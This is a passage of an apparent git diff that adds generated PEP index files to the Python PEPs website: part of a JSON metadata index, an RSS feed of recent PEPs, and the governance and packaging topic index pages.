Josiah Carlson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Aug-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3145/" + }, + "3146": { + "number": 3146, + "title": "Merging Unladen Swallow into CPython", + "authors": "Collin Winter, Jeffrey Yasskin, Reid Kleckner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3146/" + }, + "3147": { + "number": 3147, + "title": "PYC Repository Directories", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Dec-2009", + "python_version": "3.2", + "post_history": "30-Jan-2010, 25-Feb-2010, 03-Mar-2010, 12-Apr-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-April/099414.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3147/" + }, + "3148": { + "number": 3148, + "title": "futures - execute computations asynchronously", + "authors": "Brian Quinlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3148/" + }, + "3149": { + "number": 3149, + "title": "ABI version tagged .so files", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.2", + "post_history": "14-Jul-2010, 22-Jul-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-September/103408.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3149/" + }, + "3150": { + "number": 3150, + "title": "Statement local namespaces (aka \"given\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.4", + "post_history": "14-Jul-2010, 21-Apr-2011, 13-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3150/" + }, + "3151": { + "number": 3151, + "title": "Reworking the OS and IO exception hierarchy", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2010", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-October/114033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3151/" + }, + "3152": { + "number": 3152, + "title": "Cofunctions", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3152/" + }, + "3153": { + "number": 3153, + "title": "Asynchronous IO support", + "authors": "Laurens Van Houtven", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "29-May-2011", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3156", + "url": "https://peps.python.org/pep-3153/" + }, + "3154": { + "number": 3154, + "title": "Pickle protocol version 4", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2011", + "python_version": "3.4", + "post_history": "`12-Aug-2011 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130439.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3154/" + }, + "3155": { + "number": 3155, + "title": "Qualified name for classes and functions", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Oct-2011", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-November/114545.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3155/" + }, + "3156": { + "number": 3156, + "title": "Asynchronous IO Support Rebooted: the \"asyncio\" Module", + "authors": "Guido van Rossum", + "discussions_to": "python-tulip@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2012", + "python_version": "3.3", + "post_history": "21-Dec-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130419.html", + "requires": null, + "replaces": "3153", + "superseded_by": null, + "url": "https://peps.python.org/pep-3156/" + }, + "3333": { + "number": 3333, + "title": "Python Web Server Gateway Interface v1.0.1", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "26-Sep-2010", + "python_version": null, + "post_history": "26-Sep-2010, 04-Oct-2010", + "resolution": null, + "requires": null, + "replaces": "333", + "superseded_by": null, + "url": "https://peps.python.org/pep-3333/" + }, + "8000": { + "number": 8000, + "title": "Python Language Governance Proposal Overview", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8000/" + }, + "8001": { + "number": 8001, + "title": "Python Governance Voting Process", + "authors": "Brett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, \u0141ukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8001/" + }, + "8002": { + "number": 8002, + "title": "Open Source Governance Survey", + "authors": "Barry Warsaw, \u0141ukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8002/" + }, + "8010": { + "number": 8010, + "title": "The Technical Leader Governance Model", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8010/" + }, + "8011": { + "number": 8011, + "title": "Python Governance Model Lead by Trio of Pythonistas", + "authors": "Mariatta, Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8011/" + }, + "8012": { + "number": 8012, + "title": "The Community Governance Model", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "03-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8012/" + }, + "8013": { + "number": 8013, + "title": "The External Council Governance Model", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "14-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8013/" + }, + "8014": { + "number": 8014, + "title": "The Commons Governance Model", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "16-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8014/" + }, + "8015": { + "number": 8015, + "title": "Organization of the Python community", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8015/" + }, + "8016": { + "number": 8016, + "title": "The Steering Council Model", + "authors": "Nathaniel J. Smith, Donald Stufft", + "discussions_to": null, + "status": "Accepted", + "type": "Informational", + "topic": "governance", + "created": "01-Nov-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8016/" + }, + "8100": { + "number": 8100, + "title": "January 2019 Steering Council election", + "authors": "Nathaniel J. Smith, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "03-Jan-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8100/" + }, + "8101": { + "number": 8101, + "title": "2020 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "16-Nov-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8101/" + }, + "8102": { + "number": 8102, + "title": "2021 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "29-Oct-2020", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8102/" + }, + "8103": { + "number": 8103, + "title": "2022 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2021", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8103/" + }, + "8104": { + "number": 8104, + "title": "2023 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "08-Nov-2022", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8104/" + }, + "8105": { + "number": 8105, + "title": "2024 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "23-Oct-2023", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8105/" + }, + "8106": { + "number": 8106, + "title": "2025 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "21-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8106/" + }, + "0": { + "number": 0, + "title": "Index of Python Enhancement Proposals (PEPs)", + "authors": "The PEP Editors", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "13-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0000/" + } +} \ No newline at end of file diff --git a/peps.rss b/peps.rss new file mode 100644 index 00000000000..2d299e96771 --- /dev/null +++ b/peps.rss @@ -0,0 +1,92 @@ + + + + Newest Python PEPs + https://peps.python.org/ + Newest Python Enhancement Proposals (PEPs): Information on new language features and some meta-information like release procedure and schedules. + + https://cyber.harvard.edu/rss/rss.html + en + Thu, 19 Dec 2024 20:05:05 GMT + + PEP 768: Safe external debugger interface for CPython + https://peps.python.org/pep-0768/ + This PEP proposes adding a zero-overhead debugging interface to CPython that allows debuggers and profilers to safely attach to running Python processes. The interface provides safe execution points for attaching debugger code without modifying the interpreter’s normal execution path or adding runtime overhead. + Pablo Galindo Salgado (pablogsal@python.org), Matt Wozniski (godlygeek@gmail.com), Ivona Stojanovic (stojanovic.i@hotmail.com) + https://peps.python.org/pep-0768/ + Mon, 25 Nov 2024 00:00:00 GMT + + + PEP 767: Annotating Read-Only Attributes + https://peps.python.org/pep-0767/ + PEP 705 introduced the typing.ReadOnly type qualifier to allow defining read-only typing.TypedDict items. + Eneg (eneg at discuss.python.org) + https://peps.python.org/pep-0767/ + Mon, 18 Nov 2024 00:00:00 GMT + + + PEP 766: Explicit Priority Choices Among Multiple Indexes + https://peps.python.org/pep-0766/ + Package resolution is a key part of the Python user experience as the means of extending Python’s core functionality. The experience of package resolution is mostly taken for granted until someone encounters a situation where the package installer does something they don’t expect. The installer behavior with multiple indexes has been a common source of unexpected behavior. Through its ubiquity, pip has long defined the standard expected behavior across other tools in the ecosystem, but Python installers are diverging with respect to how they handle multiple indexes. At the core of this divergence is whether index contents are combined before resolving distributions, or each index is handled individually in order. pip merges all indexes before matching distributions, while uv matches distributions on one index before moving on to the next. Each approach has advantages and disadvantages. This PEP aims to describe each of these behaviors, which are referred to as “version priority” and “index priority” respectively, so that community discussions and troubleshooting can share a common vocabulary, and so that tools can implement predictable behavior based on these descriptions. + Michael Sarahan (msarahan@gmail.com) + https://peps.python.org/pep-0766/ + Mon, 18 Nov 2024 00:00:00 GMT + + + PEP 765: Disallow return/break/continue that exit a finally block + https://peps.python.org/pep-0765/ + This PEP proposes to withdraw support for return, break and continue statements that break out of a finally block. This was proposed in the past by PEP 601. The current PEP is based on empirical evidence regarding the cost/benefit of this change, which did not exist at the time that PEP 601 was rejected. It also proposes a slightly different solution than that which was proposed by PEP 601. + Irit Katriel (irit@python.org), Alyssa Coghlan (ncoghlan@gmail.com) + https://peps.python.org/pep-0765/ + Fri, 15 Nov 2024 00:00:00 GMT + + + PEP 763: Limiting deletions on PyPI + https://peps.python.org/pep-0763/ + We propose limiting when users can delete files, releases, and projects from PyPI. A project, release, or file may only be deleted within 72 hours of when it is uploaded to the index. From this point, users may only use the “yank” mechanism specified by PEP 592. + William Woodruff (william@yossarian.net), Alexis Challande (alexis.challande@trailofbits.com) + https://peps.python.org/pep-0763/ + Thu, 24 Oct 2024 00:00:00 GMT + + + PEP 8106: 2025 Term Steering Council election + https://peps.python.org/pep-8106/ + This document describes the schedule and other details of the 2024 election for the Python steering council, as specified in PEP 13. This is the steering council election for the 2025 term (i.e. Python 3.14). + Ee Durbin (ee@python.org) + https://peps.python.org/pep-8106/ + Mon, 21 Oct 2024 00:00:00 GMT + + + PEP 762: REPL-acing the default REPL + https://peps.python.org/pep-0762/ + One of Python’s core strengths is its interactive mode, also known as the Read-Eval-Print Loop (REPL), or the Python console, or the Python shell. This PEP describes the new implementation of this functionality written in Python. The new REPL released in Python 3.13 aims to provide modern features expected by today’s users, such as multi-line editing, syntax highlighting, custom commands, and an overall improved interactive experience. + Pablo Galindo Salgado (pablogsal@python.org), Łukasz Langa (lukasz@python.org), Lysandros Nikolaou (lisandrosnik@gmail.com), Emily Morehouse-Valcarcel (emily@python.org) + https://peps.python.org/pep-0762/ + Fri, 11 Oct 2024 00:00:00 GMT + + + PEP 777: How to Re-invent the Wheel + https://peps.python.org/pep-0777/ + The current wheel 1.0 specification was written over a decade ago, and has been extremely robust to changes in the Python packaging ecosystem. Previous efforts to improve the wheel specification were deferred to focus on other packaging specifications. Meanwhile, the use of wheels has changed dramatically in the last decade. There have been many requests for new wheel features over the years; however, a fundamental obstacle to evolving the wheel specification has been that there is no defined process for how to handle adding backwards-incompatible features to wheels. Therefore, to enable other PEPs to describe new enhancements to the wheel specification, this PEP prescribes compatibility requirements on future wheel revisions. This PEP does not specify a new wheel revision. The specification of a new wheel format (“Wheel 2.0”) is left to a future PEP. + Ethan Smith (ethan@ethanhs.me) + https://peps.python.org/pep-0777/ + Wed, 09 Oct 2024 00:00:00 GMT + + + PEP 761: Deprecating PGP signatures for CPython artifacts + https://peps.python.org/pep-0761/ + Since Python 3.11.0, CPython has provided two verifiable digital signatures for all CPython artifacts: PGP and Sigstore. + Seth Michael Larson (seth@python.org) + https://peps.python.org/pep-0761/ + Tue, 08 Oct 2024 00:00:00 GMT + + + PEP 760: No More Bare Excepts + https://peps.python.org/pep-0760/ + This PEP proposes disallowing bare except: clauses in Python’s exception-handling syntax. Currently, Python allows catching all exceptions with a bare except: clause, which can lead to overly broad exception handling and mask important errors. This PEP suggests requiring explicit exception types in all except clauses, promoting more precise and intentional error handling. + Pablo Galindo (pablogsal@python.org), Brett Cannon (brett@python.org) + https://peps.python.org/pep-0760/ + Wed, 02 Oct 2024 00:00:00 GMT + + + diff --git a/topic/governance/index.html b/topic/governance/index.html new file mode 100644 index 00000000000..b8d304ffc04 --- /dev/null +++ b/topic/governance/index.html @@ -0,0 +1,315 @@ + + + + + + + + Governance PEPs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Governance PEPs

+
+

Introduction

+

This is the index of all Python Enhancement Proposals (PEPs) labelled +under the ‘Governance’ topic. This is a sub-index of PEP 0, +the PEP index.

+

These PEPs detail Python’s governance, including governance model proposals +and selection, and the results of the annual steering council elections.

+
+
+

Index by Category

+
+

Process and Meta-PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PA13Python Language GovernanceThe Python core team and community
PA545Python Documentation TranslationsJulien Palard, Inada Naoki, Victor Stinner
PA609Python Packaging Authority (PyPA) GovernanceDustin Ingram, Pradyun Gedam, Sumana Harihareswara
PA729Typing governance processJelle Zijlstra, Shantanu Jain
PA731C API Working Group CharterGuido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA732The Python Documentation Editorial BoardJoanna Jablonski
+
+
+

Other Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IF8000Python Language Governance Proposal OverviewBarry Warsaw
IF8002Open Source Governance SurveyBarry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IA8016The Steering Council ModelNathaniel J. Smith, Donald Stufft
IF8100January 2019 Steering Council electionNathaniel J. Smith, Ee Durbin
IF81012020 Term Steering Council electionEwa Jodlowska, Ee Durbin
IF81022021 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81032022 Term Steering Council electionEwa Jodlowska, Ee Durbin, Joe Carey
IF81042023 Term Steering Council electionEe Durbin
IF81052024 Term Steering Council electionEe Durbin
IF81062025 Term Steering Council electionEe Durbin
+
+
+

Historical Meta-PEPs and Informational PEPs

+ + + + + + + + + + + + + + + +
PEPTitleAuthors
PF8001Python Governance Voting ProcessBrett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
+
+
+

Rejected, Superseded, and Withdrawn PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IR8010The Technical Leader Governance ModelBarry Warsaw
IR8011Python Governance Model Lead by Trio of PythonistasMariatta, Barry Warsaw
IR8012The Community Governance ModelŁukasz Langa
IR8013The External Council Governance ModelSteve Dower
IR8014The Commons Governance ModelJack Jansen
IR8015Organization of the Python communityVictor Stinner
+
+
+
+

PEP Types Key

+
    +
  • IInformational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
  • +
  • PProcess: Normative PEP describing or proposing a change to a Python community process, workflow or governance
  • +
  • SStandards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem
  • +
+

More info in PEP 1.

+
+
+

PEP Status Key

+
    +
  • AAccepted: Normative proposal accepted for implementation
  • +
  • AActive: Currently valid informational guidance, or an in-use process
  • +
  • DDeferred: Inactive draft that may be taken up again at a later time
  • +
  • <No letter>Draft: Proposal under active discussion and revision
  • +
  • FFinal: Accepted and implementation complete, or no longer active
  • +
  • PProvisional: Provisionally accepted but additional feedback needed
  • +
  • RRejected: Formally declined and will not be accepted
  • +
  • SSuperseded: Replaced by another succeeding PEP
  • +
  • WWithdrawn: Removed from consideration by sponsor or authors
  • +
+

More info in PEP 1.

+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/topic/index.html b/topic/index.html new file mode 100644 index 00000000000..c06115ec50c --- /dev/null +++ b/topic/index.html @@ -0,0 +1,109 @@ + + + + + + + + Topic Index | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+ + +
+ + + + + \ No newline at end of file diff --git a/topic/packaging/index.html b/topic/packaging/index.html new file mode 100644 index 00000000000..998d65a9866 --- /dev/null +++ b/topic/packaging/index.html @@ -0,0 +1,762 @@ + + + + + + + + Packaging PEPs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Packaging PEPs

+
+

Introduction

+

This is the index of all Python Enhancement Proposals (PEPs) labelled +under the ‘Packaging’ topic. This is a sub-index of PEP 0, +the PEP index.

+

Packaging PEPs follow the PyPA specification update process. +They are used to propose major additions or changes to the PyPA specifications. +The canonical, up-to-date packaging specifications can be found on the +Python Packaging Authority (PyPA) specifications page.

+
+
+

Index by Category

+
+

Process and Meta-PEPs

+ + + + + + + + + + + + + + + +
PEPTitleAuthors
PA609Python Packaging Authority (PyPA) GovernanceDustin Ingram, Pradyun Gedam, Sumana Harihareswara
+
+
+

Provisional PEPs (provisionally accepted; interface may still change)

+ + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SP639Improving License Clarity with Better Package MetadataPhilippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SP708Extending the Repository API to Mitigate Dependency Confusion AttacksDonald Stufft
+
+
+

Accepted PEPs (accepted; may not be implemented yet)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SA458Secure PyPI downloads with signed repository metadataTrishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SA625Filename of a Source DistributionTzu-ping Chung, Paul Moore
SA658Serve Distribution Metadata in the Simple Repository APITzu-ping Chung
SA668Marking Python base environments as “externally managed”Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SA685Comparison of extra names for optional distribution dependenciesBrett Cannon
SA691JSON-based Simple API for Python Package IndexesDonald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SA714Rename dist-info-metadata in the Simple APIDonald Stufft
SA735Dependency Groups in pyproject.tomlStephen Rosen
SA753Uniform project URLs in core metadataWilliam Woodruff, Facundo Tuesca
+
+
+

Open PEPs (under consideration)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
S480Surviving a Compromise of PyPI: End-to-end signing of packagesTrishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
S694Upload 2.0 API for Python Package RepositoriesDonald Stufft
S710Recording the provenance of installed packagesFridolín Pokorný
S711PyBI: a standard format for distributing Python BinariesNathaniel J. Smith
S725Specifying external dependencies in pyproject.tomlPradyun Gedam, Ralf Gommers
S739Static description file for build details of Python installationsFilipe Laíns3.14
S751A file format to record Python dependencies for installation reproducibilityBrett Cannon
S752Implicit namespaces for package repositoriesOfek Lev
P755Implicit namespace policy for PyPIOfek Lev
S759External Wheel HostingBarry Warsaw, Ethan Smith
S763Limiting deletions on PyPIWilliam Woodruff, Alexis Challande
I766Explicit Priority Choices Among Multiple IndexesMichael Sarahan
S777How to Re-invent the WheelEthan Smith
+
+
+

Finished PEPs (done, with a stable interface)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SF301Package Index and Metadata for DistutilsRichard Jones2.3
SF376Database of Installed Python DistributionsTarek Ziadé2.7, 3.2
SF405Python Virtual EnvironmentsCarl Meyer3.3
SF425Compatibility Tags for Built DistributionsDaniel Holth3.4
SF427The Wheel Binary Package Format 1.0Daniel Holth
SF440Version Identification and Dependency SpecificationAlyssa Coghlan, Donald Stufft
SF503Simple Repository APIDonald Stufft
SF508Dependency specification for Python Software PackagesRobert Collins
SF517A build-system independent format for source treesNathaniel J. Smith, Thomas Kluyver
SF518Specifying Minimum Build System Requirements for Python ProjectsBrett Cannon, Nathaniel J. Smith, Donald Stufft
SF527Removing Un(der)used file types/extensions on PyPIDonald Stufft
SF561Distributing and Packaging Type InformationEthan Smith3.7
SF566Metadata for Python Software Packages 2.1Dustin Ingram3.x
SF592Adding “Yank” Support to the Simple APIDonald Stufft
SF600Future ‘manylinux’ Platform Tags for Portable Linux Built DistributionsNathaniel J. Smith, Thomas Kluyver
SF610Recording the Direct URL Origin of installed distributionsStéphane Bidoul, Chris Jerdonek
SF621Storing project metadata in pyproject.tomlBrett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SF627Recording installed projectsPetr Viktorin
SF629Versioning PyPI’s Simple APIDonald Stufft
SF643Metadata for Package Source DistributionsPaul Moore
SF656Platform Tag for Linux Distributions Using MuslTzu-ping Chung
SF660Editable installs for pyproject.toml based builds (wheel based)Daniel Holth, Stéphane Bidoul
SF700Additional Fields for the Simple API for Package IndexesPaul Moore
SF715Disabling bdist_egg distribution uploads on PyPIWilliam Woodruff
SF721Using tarfile.data_filter for source distribution extractionPetr Viktorin3.12
SF723Inline script metadataOfek Lev
SF740Index support for digital attestationsWilliam Woodruff, Facundo Tuesca, Dustin Ingram
+
+
+

Historical Meta-PEPs and Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PS438Transitioning to release-file hosting on PyPIHolger Krekel, Carl Meyer
PF449Removal of the PyPI Mirror Auto Discovery and Naming SchemeDonald Stufft
PF464Removal of the PyPI Mirror Authenticity APIDonald Stufft
PF470Removing External Hosting Support on PyPIDonald Stufft
PF541Package Index Name RetentionŁukasz Langa
+
+
+

Deferred PEPs (postponed pending further research or updates)

+ + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
ID423Naming conventions and recipes related to packagingBenoit Bryon
SD491The Wheel Binary Package Format 1.9Daniel Holth
+
+
+

Rejected, Superseded, and Withdrawn PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SS241Metadata for Python Software PackagesA.M. Kuchling
SW243Module Repository Upload MechanismSean Reifschneider2.1
SR262A Database of Installed Python PackagesA.M. Kuchling
SS314Metadata for Python Software Packages 1.1A.M. Kuchling, Richard Jones2.5
SS345Metadata for Python Software Packages 1.2Richard Jones2.7
SR365Adding the pkg_resources modulePhillip J. Eby
SW381Mirroring infrastructure for PyPITarek Ziadé, Martin von Löwis
SS386Changing the version comparison module in DistutilsTarek Ziadé
SR390Static metadata for DistutilsTarek Ziadé2.7, 3.2
IW396Module Version NumbersBarry Warsaw
SR402Simplified Package Layout and PartitioningPhillip J. Eby3.3
IW426Metadata for Python Software Packages 2.0Alyssa Coghlan, Daniel Holth, Donald Stufft
SR439Inclusion of implicit pip bootstrap in Python installationRichard Jones3.4
SW459Standard Metadata Extensions for Python Software PackagesAlyssa Coghlan
IR496Environment MarkersJames Polley
IS513A Platform Tag for Portable Linux Built DistributionsRobert T. McGibbon, Nathaniel J. Smith
SR516Build system abstraction for pip/conda etcRobert Collins, Nathaniel J. Smith
IS571The manylinux2010 Platform TagMark Williams, Geoffrey Thomas, Thomas Kluyver
SR582Python local packages directoryKushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan3.12
IS599The manylinux2014 Platform TagDustin Ingram
SS631Dependency specification in pyproject.toml based on PEP 508Ofek Lev
SR633Dependency specification in pyproject.toml using an exploded TOML tableLaurie Opperman, Arun Babu Neelicattu
SW650Specifying Installer Requirements for Python ProjectsVikram Jayanthi, Dustin Ingram, Brett Cannon
SR662Editable installs via virtual wheelsBernát Gábor
SR665A file format to list Python dependencies for reproducibility of an applicationBrett Cannon, Pradyun Gedam, Tzu-ping Chung
SW704Require virtual environments by default for package installersPradyun Gedam
SR722Dependency specification for single-file scriptsPaul Moore
+
+
+
+

